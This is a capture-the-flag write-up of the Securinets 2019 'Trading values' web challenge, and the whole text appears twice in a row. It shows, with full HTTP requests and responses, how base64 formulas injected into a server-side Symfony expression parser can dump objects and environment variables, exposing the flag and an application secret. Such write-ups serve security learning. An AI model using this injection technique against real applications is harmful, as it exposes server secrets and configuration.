# Securinets Prequals CTF 2019 – Trading values

* **Category:** Web  
* **Points:** 989

## Challenge

> N00B developers are an easy target. Try to exploit the application feature
> to get the hidden flag.  
>  
> https://web1.ctfsecurinets.com/  
>  
> Author:TheEmperors

## Solution

The webiste plots some values on a graph. Here the JavaScript of the widget.

```javascript  
<script>

Highcharts.chart('container', {  
   chart: {  
       type: 'spline',  
       animation: Highcharts.svg, // don't animate in old IE  
       marginRight: 10,  
       events: {  
           load: function () {

               // set up the updating of the chart each second  
               var series = this.series[0];  
               var formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=";  
               setInterval(function () {  
                 $.get( "/default", { "formula": formula, "values":{"v1": "STC","v2":"PLA","v3":"SDF","v4":"OCK"} }   )  
                 .done(function( data ) {  
                   var x = (new Date()).getTime(), // current time  
                       y = parseInt(data);  
                   if(y<1000)formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=";  
                   else if(y>1000 && y<10000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8xMDApLXYxLmRyZikvKHYxLmF2ZyowLjMpLSh2Mi5hdmcvKCg0LzMpKnYyLm1kcyt2Mi5kbXEqMTAwKSkrKHYzLnBkaSt2My5wZGkrMy8yKig1KnYzLnJhciktNjkqdjMuZ2RwKSsxLjcqKHY0Lm11bSp2NC5kYWQpKjE2LjUqdjQuYXZn";  
                   else if(y>10000 && y<100000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjEpLXYxLmRyZikvKHYxLmF2ZyowLjgpLSh2Mi5hdmcvKCgxLzIpKnYyLm1kcy0yNC92Mi5kbXEqMTApKSsodjMucGRpLXYzLnBkaSszLzIqKDIvNSp2My5yYXIpLTY2KnYzLmdkcCkqNy41Lyh2NC5tdW0vdjQuZGFkKSo2LjUvdjQuYXZn";  
                   else formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjA2KS12MS5kcmYpLyh2MS5hdmcqMC4yNSkrKHYyLmF2Zy8oKDMvMikvdjIubWRzLTg0L3YyLmRtcSoxOSkpLSh2My5wZGktdjMucGRpKzkvMiooMTIvNyp2My5yYXIpLTY2KnYzLmdkcCkqMC41Lyh2NC5tdW0qKnY0LmRhZCkqMC4zOS92NC5hdmcqKjI=";  
                   series.addPoint([x, y], true, true);  
                 });  
               }, 1000);  
           }  
       }  
   },

   time: {  
       useUTC: false  
   },

   title: {  
       text: 'Live Securinets Trading values'  
   },  
   xAxis: {  
       type: 'datetime',  
       tickPixelInterval: 300  
   },  
   yAxis: {  
       title: {  
           text: 'Value'  
       },  
       plotLines: [{  
           value: 0,  
           width: 1,  
           color: '#808080'  
       }]  
   },  
   tooltip: {  
       headerFormat: '**{series.name}**  
',  
       pointFormat: '{point.x:%Y-%m-%d %H:%M:%S}  
{point.y:.2f}'  
   },  
   legend: {  
       enabled: false  
   },  
   exporting: {  
       enabled: false  
   },  
   series: [{  
       name: 'Random data',  
       data: (function () {  
           // generate an array of random data  
           var data = [],  
               time = (new Date()).getTime(),  
               i;

           for (i = -19; i <= 0; i += 1) {  
               data.push({  
                   x: time + i * 1000,  
                   y: Math.random()  
               });  
           }  
           return data;  
       }())  
   }]  
});  
</script>  
```

The base64 decoded formulas are the following.

```  
(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg

(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg

(v1.mpk-v1.drf*(v1.mpk/100)-v1.drf)/(v1.avg*0.3)-(v2.avg/((4/3)*v2.mds+v2.dmq*100))+(v3.pdi+v3.pdi+3/2*(5*v3.rar)-69*v3.gdp)+1.7*(v4.mum*v4.dad)*16.5*v4.avg

(v1.mpk-v1.drf*(v1.mpk/0.1)-v1.drf)/(v1.avg*0.8)-(v2.avg/((1/2)*v2.mds-24/v2.dmq*10))+(v3.pdi-v3.pdi+3/2*(2/5*v3.rar)-66*v3.gdp)*7.5/(v4.mum/v4.dad)*6.5/v4.avg

(v1.mpk-v1.drf*(v1.mpk/0.06)-v1.drf)/(v1.avg*0.25)+(v2.avg/((3/2)/v2.mds-84/v2.dmq*19))-(v3.pdi-v3.pdi+9/2*(12/7*v3.rar)-66*v3.gdp)*0.5/(v4.mum**v4.dad)*0.39/v4.avg**2  
```

The sent request is a HTTP GET with a base64 encoded formula and a series of
values to execute on the server.

```  
https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values%5Bv1%5D=STC&values%5Bv2%5D=PLA&values%5Bv3%5D=SDF&values%5Bv4%5D=OCK  
```

URL-decoded values are the following.

```  
values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK  
```

The complete request-response process is like the following.

```  
GET
/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:21:11 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Cache-Control: private, must-revalidate  
pragma: no-cache  
expires: -1  
Content-Length: 15

1023517.4691689  
```

Encoding a custom operation like `1+1` in base64 (`DQoxKzE=`) and sending as
formula, will produce a result.

```  
GET
/default?formula=DQoxKzE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:22:11 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Cache-Control: private, must-revalidate  
pragma: no-cache  
expires: -1  
Content-Length: 1

2  
```

Passing a random string, like `aaa` in base64 (`YWFh`), will give an
interesting error.

```  
GET
/default?formula=YWFh&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:26:57 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Cache-Control: private, must-revalidate  
pragma: no-cache  
expires: -1  
Content-Length: 67

Variable "aaa" is not valid around position 1 for expression `aaa`.  
```

Hence the formula is executed server side with an expression parser (i.e.
https://github.com/symfony/expression-language).

Passing directly the name of the variable, will print all the object, e.g.
passing `v1` (`djE=`) will give the following.

```  
GET
/default?formula=djE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 500 Internal Server Error  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:42:57 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Content-Length: 144

object(App\Entity\STC)#233 (4) {  
 ["id":"App\Entity\STC":private]=>  
 NULL  
 ["avg"]=>  
 int(972)  
 ["mpk"]=>  
 int(3)  
 ["drf"]=>  
 int(99)  
}  
```

So, values are objects of classes defined in a classpath. Adding a new value
`v0`, setting it to `this` and trying to print it, will give you tons of
information.

```  
GET
/default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
```

Inside the output, you will find the flag into an environment variable.

```  
                                   object(Symfony\Component\HttpFoundation\ServerBag)#10 (1) {  
                                     ["parameters":protected]=>  
                                     array(42) {  
                                       ["USER"]=>  
                                       string(8) "www-data"  
                                       ["HOME"]=>  
                                       string(8) "/var/www"  
                                       ["HTTP_UPGRADE_INSECURE_REQUESTS"]=>  
                                       string(1) "1"  
                                       ["HTTP_ACCEPT_ENCODING"]=>  
                                       string(13) "gzip, deflate"  
                                       ["HTTP_ACCEPT_LANGUAGE"]=>  
                                       string(35) "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3"  
                                       ["HTTP_ACCEPT"]=>  
                                       string(74) "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"  
                                       ["HTTP_USER_AGENT"]=>  
                                       string(78) "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"  
                                       ["HTTP_CONNECTION"]=>  
                                       string(5) "close"  
                                       ["HTTP_HOST"]=>  
                                       string(14) "127.0.0.1:8081"  
                                       ["HTTP_X_FORWARDED_FOR"]=>  
                                       string(12) "x.x.x.x"  
                                       ["HTTP_X_FORWARDED_PROTO"]=>  
                                       string(5) "https"  
                                       ["HTTP_X_FORWARDED_HOST"]=>  
                                       string(22) "web1.ctfsecurinets.com"  
                                       ["HTTP_TRUSTED_PROXIES"]=>  
                                       string(13) "172.17.0.0/16"  
                                       ["SCRIPT_FILENAME"]=>  
                                       string(51) "/var/www/html/epreuve/symfony_task/public/index.php"  
                                       ["REDIRECT_STATUS"]=>  
                                       string(3) "200"  
                                       ["SERVER_NAME"]=>  
                                       string(1) "_"  
                                       ["SERVER_PORT"]=>  
                                       string(2) "80"  
                                       ["SERVER_ADDR"]=>  
                                       string(10) "172.17.0.3"  
                                       ["REMOTE_PORT"]=>  
                                       string(5) "57272"  
                                       ["REMOTE_ADDR"]=>  
                                       string(10) "172.17.0.1"  
                                       ["SERVER_SOFTWARE"]=>  
                                       string(12) "nginx/1.10.3"  
                                       ["GATEWAY_INTERFACE"]=>  
                                       string(7) "CGI/1.1"  
                                       ["REQUEST_SCHEME"]=>  
                                       string(4) "http"  
                                       ["SERVER_PROTOCOL"]=>  
                                       string(8) "HTTP/1.0"  
                                       ["DOCUMENT_ROOT"]=>  
                                       string(41) "/var/www/html/epreuve/symfony_task/public"  
                                       ["DOCUMENT_URI"]=>  
                                       string(10) "/index.php"  
                                       ["REQUEST_URI"]=>  
                                       string(97) "/default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK"  
                                       ["SCRIPT_NAME"]=>  
                                       string(10) "/index.php"  
                                       ["CONTENT_LENGTH"]=>  
                                       string(0) ""  
                                       ["CONTENT_TYPE"]=>  
                                       string(0) ""  
                                       ["REQUEST_METHOD"]=>  
                                       string(3) "GET"  
                                       ["QUERY_STRING"]=>  
                                       string(88) "formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK"  
                                       ["FCGI_ROLE"]=>  
                                       string(9) "RESPONDER"  
                                       ["PHP_SELF"]=>  
                                       string(10) "/index.php"  
                                       ["REQUEST_TIME_FLOAT"]=>  
                                       float(1553422185.0433)  
                                       ["REQUEST_TIME"]=>  
                                       int(1553422185)  
                                       ["APP_ENV"]=>  
                                       string(4) "prod"  
                                       ["APP_SECRET"]=>  
                                       string(32) "44705a2f4fc85d70df5403ac8c7649fd"  
                                       ["FLAG"]=>  
                                       string(47) "Securinets{T00_Ea5y_T0_U5e_This_Local_variable}"  
                                       ["MAILER_URL"]=>  
                                       string(16) "null://localhost"  
                                       ["SYMFONY_DOTENV_VARS"]=>  
                                       string(34) "APP_ENV,APP_SECRET,FLAG,MAILER_URL"  
                                       ["APP_DEBUG"]=>  
                                       string(1) "0"  
                                     }  
                                   }  
```

The flag is the following.

```  
Securinets{T00_Ea5y_T0_U5e_This_Local_variable}  
```

Original writeup (https://github.com/m3ssap0/CTF-
Writeups/blob/master/Securinets%20Prequals%20CTF%202019/Trading%20values/README.md).# Securinets Prequals CTF 2019 – Trading values

* **Category:** Web  
* **Points:** 989

## Challenge

> N00B developers are an easy target. Try to exploit the application feature
> to get the hidden flag.  
>  
> https://web1.ctfsecurinets.com/  
>  
> Author:TheEmperors

## Solution

The webiste plots some values on a graph. Here the JavaScript of the widget.

```javascript  
<script>

Highcharts.chart('container', {  
chart: {  
type: 'spline',  
animation: Highcharts.svg, // don't animate in old IE  
marginRight: 10,  
events: {  
load: function () {

// set up the updating of the chart each second  
var series = this.series[0];  
var
formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=";  
setInterval(function () {  
$.get( "/default", { "formula": formula, "values":{"v1":
"STC","v2":"PLA","v3":"SDF","v4":"OCK"} } )  
.done(function( data ) {  
var x = (new Date()).getTime(), // current time  
y = parseInt(data);  
if(y<1000)formula="KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc=";  
else if(y>1000 &&
y<10000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8xMDApLXYxLmRyZikvKHYxLmF2ZyowLjMpLSh2Mi5hdmcvKCg0LzMpKnYyLm1kcyt2Mi5kbXEqMTAwKSkrKHYzLnBkaSt2My5wZGkrMy8yKig1KnYzLnJhciktNjkqdjMuZ2RwKSsxLjcqKHY0Lm11bSp2NC5kYWQpKjE2LjUqdjQuYXZn";  
else if(y>10000 &&
y<100000)formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjEpLXYxLmRyZikvKHYxLmF2ZyowLjgpLSh2Mi5hdmcvKCgxLzIpKnYyLm1kcy0yNC92Mi5kbXEqMTApKSsodjMucGRpLXYzLnBkaSszLzIqKDIvNSp2My5yYXIpLTY2KnYzLmdkcCkqNy41Lyh2NC5tdW0vdjQuZGFkKSo2LjUvdjQuYXZn";  
else
formula="KHYxLm1way12MS5kcmYqKHYxLm1way8wLjA2KS12MS5kcmYpLyh2MS5hdmcqMC4yNSkrKHYyLmF2Zy8oKDMvMikvdjIubWRzLTg0L3YyLmRtcSoxOSkpLSh2My5wZGktdjMucGRpKzkvMiooMTIvNyp2My5yYXIpLTY2KnYzLmdkcCkqMC41Lyh2NC5tdW0qKnY0LmRhZCkqMC4zOS92NC5hdmcqKjI=";  
series.addPoint([x, y], true, true);  
});  
}, 1000);  
}  
}  
},

time: {  
useUTC: false  
},

title: {  
text: 'Live Securinets Trading values'  
},  
xAxis: {  
type: 'datetime',  
tickPixelInterval: 300  
},  
yAxis: {  
title: {  
text: 'Value'  
},  
plotLines: [{  
value: 0,  
width: 1,  
color: '#808080'  
}]  
},  
tooltip: {  
headerFormat: '**{series.name}**  
',  
pointFormat: '{point.x:%Y-%m-%d %H:%M:%S}  
{point.y:.2f}'  
},  
legend: {  
enabled: false  
},  
exporting: {  
enabled: false  
},  
series: [{  
name: 'Random data',  
data: (function () {  
// generate an array of random data  
var data = [],  
time = (new Date()).getTime(),  
i;

for (i = -19; i <= 0; i += 1) {  
data.push({  
x: time + i * 1000,  
y: Math.random()  
});  
}  
return data;  
}())  
}]  
});  
</script>  
```

The base64 decoded formulas are the following.

```  
(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg

(v1.mpk+v1.drf*(v1.mpk/0.5)-v1.drf)/(v1.avg*0.1)+(v2.avg*(v2.mds+v2.dmq))-(v3.pdi+v3.pdi+3/2*(v3.rar)-v3.gdp)+0.25*(v4.mum*v4.dad)*v4.avg

(v1.mpk-v1.drf*(v1.mpk/100)-v1.drf)/(v1.avg*0.3)-(v2.avg/((4/3)*v2.mds+v2.dmq*100))+(v3.pdi+v3.pdi+3/2*(5*v3.rar)-69*v3.gdp)+1.7*(v4.mum*v4.dad)*16.5*v4.avg

(v1.mpk-v1.drf*(v1.mpk/0.1)-v1.drf)/(v1.avg*0.8)-(v2.avg/((1/2)*v2.mds-24/v2.dmq*10))+(v3.pdi-v3.pdi+3/2*(2/5*v3.rar)-66*v3.gdp)*7.5/(v4.mum/v4.dad)*6.5/v4.avg

(v1.mpk-v1.drf*(v1.mpk/0.06)-v1.drf)/(v1.avg*0.25)+(v2.avg/((3/2)/v2.mds-84/v2.dmq*19))-(v3.pdi-v3.pdi+9/2*(12/7*v3.rar)-66*v3.gdp)*0.5/(v4.mum**v4.dad)*0.39/v4.avg**2  
```

The sent request is a HTTP GET with a base64 encoded formula and a series of
values to execute on the server.

```  
https://web1.ctfsecurinets.com/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values%5Bv1%5D=STC&values%5Bv2%5D=PLA&values%5Bv3%5D=SDF&values%5Bv4%5D=OCK  
```

URL-decoded values are the following.

```  
values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK  
```

The complete request-response process is like the following.

```  
GET
/default?formula=KHYxLm1wayt2MS5kcmYqKHYxLm1way8wLjUpLXYxLmRyZikvKHYxLmF2ZyowLjEpKyh2Mi5hdmcqKHYyLm1kcyt2Mi5kbXEpKS0odjMucGRpK3YzLnBkaSszLzIqKHYzLnJhciktdjMuZ2RwKSswLjI1Kih2NC5tdW0qdjQuZGFkKSp2NC5hdmc%3D&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:21:11 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Cache-Control: private, must-revalidate  
pragma: no-cache  
expires: -1  
Content-Length: 15

1023517.4691689  
```

Encoding a custom operation like `1+1` in base64 (`DQoxKzE=`) and sending as
formula, will produce a result.

```  
GET
/default?formula=DQoxKzE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:22:11 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Cache-Control: private, must-revalidate  
pragma: no-cache  
expires: -1  
Content-Length: 1

2  
```

Passing a random string, like `aaa` in base64 (`YWFh`), will give an
interesting error.

```  
GET
/default?formula=YWFh&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:26:57 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Cache-Control: private, must-revalidate  
pragma: no-cache  
expires: -1  
Content-Length: 67

Variable "aaa" is not valid around position 1 for expression `aaa`.  
```

Hence the formula is executed server side with an expression parser (i.e.
https://github.com/symfony/expression-language).

Passing directly the name of the variable, will print all the object, e.g.
passing `v1` (`djE=`) will give the following.

```  
GET
/default?formula=djE=&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1

HTTP/1.1 500 Internal Server Error  
Server: nginx/1.10.3 (Ubuntu)  
Date: Sun, 24 Mar 2019 09:42:57 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Content-Length: 144

object(App\Entity\STC)#233 (4) {  
["id":"App\Entity\STC":private]=>  
NULL  
["avg"]=>  
int(972)  
["mpk"]=>  
int(3)  
["drf"]=>  
int(99)  
}  
```

So, values are objects of classes defined in a classpath. Adding a new value
`v0`, setting it to `this` and trying to print it, will give you tons of
information.

```  
GET
/default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK
HTTP/1.1  
Host: web1.ctfsecurinets.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0  
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
```

Inside the output, you will find the flag into an environment variable.

```  
object(Symfony\Component\HttpFoundation\ServerBag)#10 (1) {  
["parameters":protected]=>  
array(42) {  
["USER"]=>  
string(8) "www-data"  
["HOME"]=>  
string(8) "/var/www"  
["HTTP_UPGRADE_INSECURE_REQUESTS"]=>  
string(1) "1"  
["HTTP_ACCEPT_ENCODING"]=>  
string(13) "gzip, deflate"  
["HTTP_ACCEPT_LANGUAGE"]=>  
string(35) "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3"  
["HTTP_ACCEPT"]=>  
string(74)
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"  
["HTTP_USER_AGENT"]=>  
string(78) "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101
Firefox/65.0"  
["HTTP_CONNECTION"]=>  
string(5) "close"  
["HTTP_HOST"]=>  
string(14) "127.0.0.1:8081"  
["HTTP_X_FORWARDED_FOR"]=>  
string(12) "x.x.x.x"  
["HTTP_X_FORWARDED_PROTO"]=>  
string(5) "https"  
["HTTP_X_FORWARDED_HOST"]=>  
string(22) "web1.ctfsecurinets.com"  
["HTTP_TRUSTED_PROXIES"]=>  
string(13) "172.17.0.0/16"  
["SCRIPT_FILENAME"]=>  
string(51) "/var/www/html/epreuve/symfony_task/public/index.php"  
["REDIRECT_STATUS"]=>  
string(3) "200"  
["SERVER_NAME"]=>  
string(1) "_"  
["SERVER_PORT"]=>  
string(2) "80"  
["SERVER_ADDR"]=>  
string(10) "172.17.0.3"  
["REMOTE_PORT"]=>  
string(5) "57272"  
["REMOTE_ADDR"]=>  
string(10) "172.17.0.1"  
["SERVER_SOFTWARE"]=>  
string(12) "nginx/1.10.3"  
["GATEWAY_INTERFACE"]=>  
string(7) "CGI/1.1"  
["REQUEST_SCHEME"]=>  
string(4) "http"  
["SERVER_PROTOCOL"]=>  
string(8) "HTTP/1.0"  
["DOCUMENT_ROOT"]=>  
string(41) "/var/www/html/epreuve/symfony_task/public"  
["DOCUMENT_URI"]=>  
string(10) "/index.php"  
["REQUEST_URI"]=>  
string(97)
"/default?formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK"  
["SCRIPT_NAME"]=>  
string(10) "/index.php"  
["CONTENT_LENGTH"]=>  
string(0) ""  
["CONTENT_TYPE"]=>  
string(0) ""  
["REQUEST_METHOD"]=>  
string(3) "GET"  
["QUERY_STRING"]=>  
string(88)
"formula=djA=&values[v0]=this&values[v1]=STC&values[v2]=PLA&values[v3]=SDF&values[v4]=OCK"  
["FCGI_ROLE"]=>  
string(9) "RESPONDER"  
["PHP_SELF"]=>  
string(10) "/index.php"  
["REQUEST_TIME_FLOAT"]=>  
float(1553422185.0433)  
["REQUEST_TIME"]=>  
int(1553422185)  
["APP_ENV"]=>  
string(4) "prod"  
["APP_SECRET"]=>  
string(32) "44705a2f4fc85d70df5403ac8c7649fd"  
["FLAG"]=>  
string(47) "Securinets{T00_Ea5y_T0_U5e_This_Local_variable}"  
["MAILER_URL"]=>  
string(16) "null://localhost"  
["SYMFONY_DOTENV_VARS"]=>  
string(34) "APP_ENV,APP_SECRET,FLAG,MAILER_URL"  
["APP_DEBUG"]=>  
string(1) "0"  
}  
}  
```

The flag is the following.

```  
Securinets{T00_Ea5y_T0_U5e_This_Local_variable}  
```

Original writeup (https://github.com/m3ssap0/CTF-
Writeups/blob/master/Securinets%20Prequals%20CTF%202019/Trading%20values/README.md).